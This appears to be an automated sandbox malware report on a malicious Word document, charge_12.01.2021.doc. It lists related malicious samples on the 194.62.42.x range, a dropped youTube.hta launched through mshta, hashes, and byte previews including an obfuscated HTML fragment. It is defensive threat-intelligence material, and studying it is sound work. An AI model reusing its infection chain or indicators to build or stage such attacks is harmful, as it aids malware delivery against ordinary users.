                                                                                                                                                      • Excluded IPs from analysis (whitelisted): 52.109.6.42, 52.109.8.25, 52.109.76.33
                                                                                                                                                      • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, prod-w.nexus.live.com.akadns.net, config.officeapps.live.com, prod.configsvc1.live.com.akadns.net, us.configsvc1.live.com.akadns.net, ctldl.windowsupdate.com, nexus.officeapps.live.com, displaycatalog.mp.microsoft.com, officeclient.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                                                                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                      • VT rate limit hit for: /opt/package/joesandbox/database/analysis/532355/sample/charge_12.01.2021.doc

                                                                                                                                                      Simulations

                                                                                                                                                      Behavior and APIs

                                                                                                                                                      No simulations

                                                                                                                                                      Joe Sandbox View / Context

                                                                                                                                                      IPs

                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                      194.62.42.207charge_12.01.2021.docGet hashmaliciousBrowse

                                                                                                                                                        Domains

                                                                                                                                                        No context

                                                                                                                                                        ASN

                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                        ZEISS-ASRUcharge_12.01.2021.docGet hashmaliciousBrowse
                                                                                                                                                        • 194.62.42.207
                                                                                                                                                        legal agreement 11.15.2021.docGet hashmaliciousBrowse
                                                                                                                                                        • 194.62.42.147
                                                                                                                                                        legal agreement 11.15.2021.docGet hashmaliciousBrowse
                                                                                                                                                        • 194.62.42.147
                                                                                                                                                        legal agreement 11.15.2021.docGet hashmaliciousBrowse
                                                                                                                                                        • 194.62.42.147
                                                                                                                                                        files_11.15.2021.docGet hashmaliciousBrowse
                                                                                                                                                        • 194.62.42.148
                                                                                                                                                        files_11.15.2021.docGet hashmaliciousBrowse
                                                                                                                                                        • 194.62.42.148
                                                                                                                                                        files_11.15.2021.docGet hashmaliciousBrowse
                                                                                                                                                        • 194.62.42.148
                                                                                                                                                        instruct_11.21.doc.docmGet hashmaliciousBrowse
                                                                                                                                                        • 194.62.42.144
                                                                                                                                                        instruct_11.21.doc.docmGet hashmaliciousBrowse
                                                                                                                                                        • 194.62.42.144
                                                                                                                                                        instruct_11.21.doc.docmGet hashmaliciousBrowse
                                                                                                                                                        • 194.62.42.144
                                                                                                                                                        particulars 11.010.2021.docGet hashmaliciousBrowse
                                                                                                                                                        • 194.62.42.144
                                                                                                                                                        particulars 11.010.2021.docGet hashmaliciousBrowse
                                                                                                                                                        • 194.62.42.144
                                                                                                                                                        inquiry-11.21.docGet hashmaliciousBrowse
                                                                                                                                                        • 194.62.42.45
                                                                                                                                                        inquiry-11.21.docGet hashmaliciousBrowse
                                                                                                                                                        • 194.62.42.45
                                                                                                                                                        inquiry-11.21.docGet hashmaliciousBrowse
                                                                                                                                                        • 194.62.42.45
                                                                                                                                                        bE5TVG6QkV.docmGet hashmaliciousBrowse
                                                                                                                                                        • 194.62.42.31
                                                                                                                                                        bE5TVG6QkV.docmGet hashmaliciousBrowse
                                                                                                                                                        • 194.62.42.31
                                                                                                                                                        pZt5P80bs1.docmGet hashmaliciousBrowse
                                                                                                                                                        • 194.62.42.143
                                                                                                                                                        pZt5P80bs1.docmGet hashmaliciousBrowse
                                                                                                                                                        • 194.62.42.143
                                                                                                                                                        jk2BhrWvzs.docmGet hashmaliciousBrowse
                                                                                                                                                        • 194.62.42.144

                                                                                                                                                        JA3 Fingerprints

                                                                                                                                                        No context

                                                                                                                                                        Dropped Files

                                                                                                                                                        No context

                                                                                                                                                        Created / dropped Files

                                                                                                                                                        C:\Users\Public\dowNext.jpg
                                                                                                                                                        Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                        File Type:HTML document, ASCII text
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):203
                                                                                                                                                        Entropy (8bit):5.150186571388359
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6:pn0+Dy9xwGObRmEr6VnetdzRx3/ZKCezocKqD:J0+oxBeRmR9etdzRx/Fez1T
                                                                                                                                                        MD5:B5FF4C0F214FDF079AE6D835F046B7C5
                                                                                                                                                        SHA1:FC1F09A696C92D366E4868A35A5AFA79129B12BE
                                                                                                                                                        SHA-256:AAF04ECB4C67DE5A7833184F5ABEEC5F48A2FC17BB8167637A421596E00C7E4C
                                                                                                                                                        SHA-512:5DCFA31DD1A704AE698673763A2C3E96F0C7E70D06D4790033B6ECCAFF7E6A55D7D4F2913649915E1AD430E4FA9C68143D82A95A38C2B0BC315AD91099AEAB3A
                                                                                                                                                        Malicious:false
                                                                                                                                                        Reputation:low
                                                                                                                                                        Preview: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL "cab3" was not found on this server.</p>.</body></html>.
                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\7CC1B43E-0D2C-47F4-8AD2-E8873A50A321
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                        File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):140143
                                                                                                                                                        Entropy (8bit):5.358582751621857
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:1536:ATcQIfgxrBdA3gBwtnQ9DQW+z2b4Ff7nXbovidXiE6LWmE9:OuQ9DQW+zNXfH
                                                                                                                                                        MD5:AA85D150EFA81D45B8E01C7655A63F39
                                                                                                                                                        SHA1:E5E24EE468337330B0B0F3B3C6D83DD9ECD0A728
                                                                                                                                                        SHA-256:961C676BA71CE00825B84DD929762CDE6BDA9629430B0274C970B3A230689A68
                                                                                                                                                        SHA-512:84CDC0E5FE3E7BBDE5EF15F106695A7249294AAA8948A168A8623FDE0A4507AFE26128E7AC0706F13B7DACE7F4396D13706A8C89903C3A4F79C6DA282B2E6CBB
                                                                                                                                                        Malicious:false
                                                                                                                                                        Reputation:low
                                                                                                                                                        Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-12-02T03:26:55">.. Build: 16.0.14715.30527-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\7E8CFCDF.gif
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                        File Type:GIF image data, version 89a, 774 x 198
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):14327
                                                                                                                                                        Entropy (8bit):7.959467120915826
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:384:3j0EEYpcVhE1ltmTV/YZO4NSCWl822TnU0:w02VWnZdw9822zv
                                                                                                                                                        MD5:76DA3E2154587DD3D69A81FCDB0C7364
                                                                                                                                                        SHA1:0F23E27B3A456B22A11D3FBC3132397B0DDC9357
                                                                                                                                                        SHA-256:F9299AB3483A8F729B2ACA2111B46E9952D4491AC66124FEC22C1C789EBC3139
                                                                                                                                                        SHA-512:A20BA525941043701E8DA5234A286FF2AF0A5F4C45998F1BA3BD59785FF4CDDAA72DE316D0BC651C68F30A6587741539B51D356BF5D6FEEAFCAE492AB277BB45
                                                                                                                                                        Malicious:false
                                                                                                                                                        Reputation:moderate, very likely benign file
                                                                                                                                                        Preview: GIF89a.............A..)P..?...........4.............P..K.Uo.f}.v..............=..J..G..M..J..H..F..=..O..L..K..@..<..;..9..5z.R..N..M..M..3v.2s.P..1r.1q.W..F..I..J. K.&Q.Ch.A`.d............C..R.."L.T..A...h..g.*^.%T.O..P..8..4v..@.U..T..S..Q..F..>..S..P..@..2m.[..Y..X..V..R..B..U..T..W..O..T..O.*g.|...............I..M..Q..W...1.W.._..W..]..]..\..[..Z..W..V..C..5p.b..]..[..X..W..Y..Q..O..^..[..Z../a.]..\..Z..^..X.._.._..I..`..]..a..`.!c.!^.%e.$b.&f.)h.5q.>v.H~.Y..h..v.............................N..R..U..X..Z..b..`..\..`..a..b..c..d..O. d. d..R.!f."g."e.!f.#g.,m............._."k..P..9g%m........As*z.)x.,~.+|.+{.&n. \..Gy*v.6..K....../...Bm.........6....;..9..8..A..:..:..3..+l.B..C..F..N..R..T..\..i..@..@..=..A..@..D..=..7.."Uy<..%].K..N.......................!..NETSCAPE2.0.....!.......,...............H......*\....#J.H....3j.... C..I...(S.\...0c.I...8s.....@...J...H.*]...P.J.J...X.j....`..K...h.]...p..K...x..........L.....+^....#K.L....3k.....
                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRF{982F1FC3-FE5F-460D-815F-F7FB76116FDC}.tmp
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):32768
                                                                                                                                                        Entropy (8bit):3.5800373733053688
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:192:rtC/c8r5cBp19v3+DQM7wbwM8N0jHa3tC/c8r5cBp19v3+DQM7wbwM8N0jHa:rtmcmkv+Mvj8N0jatmcmkv+Mvj8N0j
                                                                                                                                                        MD5:656F3FFE587050FF48DD81534AF89B09
                                                                                                                                                        SHA1:0BC83FB630A03C21635C5A2A7F9212E015E36B2E
                                                                                                                                                        SHA-256:FC203C64D2FEA74635495706932CED455543759E42FC97A1F7CEB50B7AF8CA98
                                                                                                                                                        SHA-512:64EA804B6BB0950719BB698E98EAE1062B9D316C56875D463B339BC11C611EC76F152E27663487ABD333754B00110476EB480C560223251D797F5928580E314B
                                                                                                                                                        Malicious:false
                                                                                                                                                        Reputation:low
                                                                                                                                                        Preview: ......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{72E38456-4F34-4E52-A3A7-A6E417760002}.tmp
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1024
                                                                                                                                                        Entropy (8bit):0.05390218305374581
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3:ol3lYdn:4Wn
                                                                                                                                                        MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                                                                                                        SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                                                                                                        SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                                                                                                        SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                                                                                                        Malicious:false
                                                                                                                                                        Reputation:high, very likely benign file
                                                                                                                                                        Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{D7038A18-F087-45E8-BEBC-452C84E30D87}.tmp
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):21070
                                                                                                                                                        Entropy (8bit):2.7051724386748672
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:384:UlKV5yQOUVTs4SULwZ4pPVqHoVTQCOiTY5qFQ5q9eH4TsssHsU9YsqYjQYxtYn9q:ZGQOUVTs4SULwZ4pPVqHoVTQCOiThFJI
                                                                                                                                                        MD5:F21872093625D2BA00E54A3D108AF87C
                                                                                                                                                        SHA1:863CA8B13F268B27CCE55FB2529F6DEB0E3F7FAD
                                                                                                                                                        SHA-256:415D7D16904A8DEFC4E43F7B987E07C6DE35129DA74C02EDF24AA2D09BBE0D65
                                                                                                                                                        SHA-512:2C9244309A1C5DC95AB46FBEE99599DDE2481FE182665F63E9FA6C2958A930B4B312698B0CE6F941F3B1BA81672472F74CBF72851AEE410386C3BE8DCB0B2FAF
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview: ../.<.@.1.h.@.1.t.@.1.m.@.1.l.@.1.>.@.1.<.@.1.b.@.1.o.@.1.d.@.1.y.@.1.>.@.1.<.@.1.d.@.1.i.@.1.v.@.1. .@.1.i.@.1.d.@.1.=.@.1.'.@.1.k.@.1.a.@.1.r.@.1.o.@.1.l.@.1.Y.@.1.o.@.1.u.@.1.'.@.1. .@.1.s.@.1.t.@.1.y.@.1.l.@.1.e.@.1.=.@.1.'.@.1.f.@.1.o.@.1.n.@.1.t.@.1.-.@.1.c.@.1.o.@.1.l.@.1.o.@.1.r.@.1.:.@.1. .@.1.#.@.1.0.@.1.0.@.1.0.@.1.'.@.1.>.@.1.l.@.1.a.@.1.v.@.1.e.@.1.<.@.1./.@.1.d.@.1.i.@.1.v.@.1.>.@.1.<.@.1.d.@.1.i.@.1.v.@.1. .@.1.i.@.1.d.@.1.=.@.1.'.@.1.t.@.1.u.@.1.b.@.1.e.@.1.G.@.1.i.@.1.r.@.1.l.@.1.'.@.1. ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\cab3[1].htm
                                                                                                                                                        Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                        File Type:HTML document, ASCII text
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):203
                                                                                                                                                        Entropy (8bit):5.150186571388359
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6:pn0+Dy9xwGObRmEr6VnetdzRx3/ZKCezocKqD:J0+oxBeRmR9etdzRx/Fez1T
                                                                                                                                                        MD5:B5FF4C0F214FDF079AE6D835F046B7C5
                                                                                                                                                        SHA1:FC1F09A696C92D366E4868A35A5AFA79129B12BE
                                                                                                                                                        SHA-256:AAF04ECB4C67DE5A7833184F5ABEEC5F48A2FC17BB8167637A421596E00C7E4C
                                                                                                                                                        SHA-512:5DCFA31DD1A704AE698673763A2C3E96F0C7E70D06D4790033B6ECCAFF7E6A55D7D4F2913649915E1AD430E4FA9C68143D82A95A38C2B0BC315AD91099AEAB3A
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL "cab3" was not found on this server.</p>.</body></html>.
                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Documents.LNK
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Thu Jun 27 16:19:49 2019, mtime=Thu Dec 2 11:26:58 2021, atime=Thu Sep 23 14:11:48 2021, length=12288, window=hide
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):932
                                                                                                                                                        Entropy (8bit):4.662879866027562
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:12:8iwL3BUEuElPCH2NJ/gNIyxPDDYjAX/14yCN1L9L4lC54lu4t2Y+xIBjKZm:8i89JUIyx0AXyv0cm47aB6m
                                                                                                                                                        MD5:6EE53943CF3F6DC9214DB2DB368E7DB9
                                                                                                                                                        SHA1:5F8E447C7919CCE056F0F998B7586273DFC66CD3
                                                                                                                                                        SHA-256:E59EBF58B5419C682A702EB064D8E3E102DE562B1D3B58B7E37C503F3C47AEC4
                                                                                                                                                        SHA-512:74C4B362DE8F48E6DDD8E468707DF1A1447AB7E16EBD53A9B096BF3F1A03A3322DD219A589CD325E18CB81E4E917998D035142C1153D1E329136F98AB60FF96F
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview: L..................F........N....-...:f.w....T.T.....0......................{....P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...STc....................:.....q|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....7Svy..user.<.......Ny..STc.....S......................0.h.a.r.d.z.......1.....7Syy..DOCUME~1..l.......Ny..S`c.....Y..............B......j..D.o.c.u.m.e.n.t.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.7.0.......G...............-.......F...........>.S......C:\Users\user\Documents........\.....\.....\.....\.....\.D.o.c.u.m.e.n.t.s.............y...............#.F..l.H.i.y...`.......X.......585948...........!a..%.H.VZAj...1.4...........-..!a..%.H.VZAj...1.4...........-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............
                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\charge_12.01.2021.doc.LNK
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Thu Sep 23 14:11:40 2021, mtime=Thu Dec 2 11:26:56 2021, atime=Thu Dec 2 11:26:52 2021, length=33465, window=hide
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1090
                                                                                                                                                        Entropy (8bit):4.661373937752013
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:12:8//vUEuElPCH2NJdgRVTB+WMjXjh96OjAr/c9gm2WDY9Lab5al4t2Y+xIBjKZm:83J+tu5ArpmDimb8X7aB6m
                                                                                                                                                        MD5:D4A1160658A7D6F5CC082B3BD3CFC63E
                                                                                                                                                        SHA1:B7AF3A5834463C6C13DD48E4A5894511683FBE33
                                                                                                                                                        SHA-256:D3F266DED0A278F9D523A15ED1A65EC7B7557EBA271640A8BBD19FEC61BEF1FF
                                                                                                                                                        SHA-512:01A7C637CAA186CEED08D07A432734B707059A6D05C1CA60F22B5303023C7FE221A651E9885249A2210E8427E8DC95645C4D3BC1A12A6B8BCC95BAC8262A6865
                                                                                                                                                        Malicious:true
                                                                                                                                                        Preview: L..................F.... ...'.{O......d.w.......w................................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...STc....................:.....q|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....7Svy..user.<.......Ny..STc.....S......................0.h.a.r.d.z.....~.1.....7Syy..Desktop.h.......Ny..STc.....Y..............>.........D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....x.2......S[c .CHARGE~1.DOC..\......7Suy.S[c....h.........................c.h.a.r.g.e._.1.2...0.1...2.0.2.1...d.o.c.......[...............-.......Z...........>.S......C:\Users\user\Desktop\charge_12.01.2021.doc..,.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.c.h.a.r.g.e._.1.2...0.1...2.0.2.1...d.o.c.........:..,.LB.)...As...`.......X.......585948...........!a..%.H.VZAj......M..........-..!a..%.H.VZAj......M..........-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2
                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):162
                                                                                                                                                        Entropy (8bit):4.843269680153589
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3:bDuMJleWSGCKLbpzC5S/WCEKU0XCmX1a+CGCKLbpzCmxWIMov7QR0XCv:bCES2NzASe70XE+C2NzHUR0Xs
                                                                                                                                                        MD5:E91DD663702EA899117B59C00E489E66
                                                                                                                                                        SHA1:C4B60308DFC7FB795EA64DDD5C52C027E78ABE85
                                                                                                                                                        SHA-256:B509F3B57DB1E87AF3D1A7F07029B123C7D5D3EEBC415145D87A76C58DDC0E48
                                                                                                                                                        SHA-512:3EBD713C14F3C2805DEEF07A6A5D8A6F89CCF5F323BF15AE6499A686BFB6CDABFB834B372D621DF7923D85BD60B99504077D23480587035F0A6AA2AD918A8DD0
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview: [folders]..Templates.LNK=0..charge_12.01.2021.doc.LNK=0..Documents.LNK=0..youTube.hta.LNK=0..[doc]..charge_12.01.2021.doc.LNK=0..[misc??????]..youTube.hta.LNK=0..
                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\youTube.hta.LNK
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Thu Dec 2 11:26:58 2021, mtime=Thu Dec 2 11:26:58 2021, atime=Thu Dec 2 11:26:58 2021, length=3342, window=hide
                                                                                                                                                        Category:modified
                                                                                                                                                        Size (bytes):1066
                                                                                                                                                        Entropy (8bit):4.680764020755961
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:12:8J/6A0UEuElPCH2NJ/SIRID9KXGkYjAj/UnIWlyCN1L9L0b50l4t2Y+xIBjKZm:8JjCJaIRAG8AjcIWtvIbiX7aB6m
                                                                                                                                                        MD5:4A5CE92D4E76F708C99714DEF014C41D
                                                                                                                                                        SHA1:DD3DDB06FA749FD03C1103BFF4FEB9D86F9DA491
                                                                                                                                                        SHA-256:104926EDE831E12ACEB4758623EBDB664640553783DB0D6E2E46B0B3E0945CEA
                                                                                                                                                        SHA-512:563C95A1300072A123796B7DE26D274099E3B18E1C81FDE8DDCB5CD7DED21ED392C56336DE482B1B01515A8A6CD90A7DD34E9C22CDBA346B8DA717688CDB3204
                                                                                                                                                        Malicious:true
                                                                                                                                                        Preview: L..................F.... .....h.w...e...w...e...w................................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...STc....................:.....q|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....7Svy..user.<.......Ny..STc.....S......................0.h.a.r.d.z.......1......S`c..DOCUME~1..l.......Ny..S`c.....Y..............B......T..D.o.c.u.m.e.n.t.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.7.0.....b.2......S`c .youTube.hta.H......S`c.S`c...."......................S..y.o.u.T.u.b.e...h.t.a.......S...............-.......R...........>.S......C:\Users\user\Documents\youTube.hta..$.....\.....\.....\.....\.....\.D.o.c.u.m.e.n.t.s.\.y.o.u.T.u.b.e...h.t.a.............y...............#.F..l.H.i.y...`.......X.......585948...........!a..%.H.VZAj...T..M..........-..!a..%.H.VZAj...T..M..........-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2........
                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):162
                                                                                                                                                        Entropy (8bit):2.144407689125217
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3:Rl/ZdrlX/ttl+ruBJ/lBlqKbRlt7:RtZtlXCuXcARlB
                                                                                                                                                        MD5:A66D5DB2BD2ED61BAF4E9EDA767F31E9
                                                                                                                                                        SHA1:C822CC47CD77724175A96D15BDBFE8D22F09A75D
                                                                                                                                                        SHA-256:4965D751BA6AB64253C730DC06471B8CBE4E6ECF941CEB76C921FA858DEAE84B
                                                                                                                                                        SHA-512:DD2EA404B1CCE1D0F8600A1875D90FB998C4499C3212D059EDEFF5AE7E0B4F901C4FD6710A7B75F8CC49A4D007CF6D2A12B7B638B3773313CAC4C0F997D37EA3
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview: .pratesh................................................p.r.a.t.e.s.h.........&.G.............................".K.............H.......6C......>.O.............$...
                                                                                                                                                        C:\Users\user\Desktop\~$arge_12.01.2021.doc
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):162
                                                                                                                                                        Entropy (8bit):2.144407689125217
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3:Rl/ZdrlX/ttl+ruBJ/lBlqKbRlt7:RtZtlXCuXcARlB
                                                                                                                                                        MD5:A66D5DB2BD2ED61BAF4E9EDA767F31E9
                                                                                                                                                        SHA1:C822CC47CD77724175A96D15BDBFE8D22F09A75D
                                                                                                                                                        SHA-256:4965D751BA6AB64253C730DC06471B8CBE4E6ECF941CEB76C921FA858DEAE84B
                                                                                                                                                        SHA-512:DD2EA404B1CCE1D0F8600A1875D90FB998C4499C3212D059EDEFF5AE7E0B4F901C4FD6710A7B75F8CC49A4D007CF6D2A12B7B638B3773313CAC4C0F997D37EA3
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview: .pratesh................................................p.r.a.t.e.s.h.........&.G.............................".K.............H.......6C......>.O.............$...
                                                                                                                                                        C:\Users\user\Documents\youTube.hta (copy)
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                        File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):3342
                                                                                                                                                        Entropy (8bit):5.787478297876638
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:96:iOVvcNLnp15eL/XaxaFD1OIWCOrWETgAgQg+jgMo0Y01MDdq:iOVqb5Sa05OIWCSWETgAgQgKgu1o8
                                                                                                                                                        MD5:55D9EAB53D4063A53B6ED05F7B1E75E7
                                                                                                                                                        SHA1:E6B4C81676D3EF0D2F7D08A6CC2AD90EB54908C3
                                                                                                                                                        SHA-256:C7F40608CE8A3DDA25C13D117790D08EF757B07B8C2CCB645A27A71ADC322FB2
                                                                                                                                                        SHA-512:E90768D87C7B191D41D3944957725DB0E1F29FA865E24FD7308656FC9249CA0A5D1BD0ABEDA3BBC68528EFC0CE6BC3A79EB434C375FD5C6EC90455C6E19A74F9
                                                                                                                                                        Malicious:false
